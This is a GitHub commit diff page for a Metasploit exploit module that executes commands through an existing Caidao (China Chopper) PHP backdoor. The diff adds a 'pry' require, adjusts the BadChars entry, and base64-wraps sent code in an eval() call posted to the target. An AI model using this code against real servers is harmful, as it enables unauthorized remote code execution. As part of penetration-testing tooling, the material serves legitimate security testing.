We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 6c16d2a commit 46fe0c0Copy full SHA for 46fe0c0
modules/exploits/multi/http/caidao_php_backdoor_exec.rb
@@ -5,6 +5,7 @@
5
##
6
7
require 'msf/core'
8
+require 'pry'
9
10
class Metasploit4 < Msf::Exploit::Remote
11
Rank = ExcellentRanking
@@ -26,7 +27,7 @@ def initialize(info = {})
26
27
],
28
'Payload' =>
29
{
- 'BadChars' => '\x00',
30
+ 'BadChars' => '\x00'
31
},
32
'Platform' => ['php'],
33
'Arch' => ARCH_PHP,
@@ -46,6 +47,7 @@ def initialize(info = {})
46
47
end
48
49
def http_send_command(code)
50
+ code = "eval(base64_decode(\"#{Rex::Text.encode_base64(code)}\"));"
51
res = send_request_cgi({
52
'method' => 'POST',
53
'uri' => normalize_uri(target_uri.path),
0 commit comments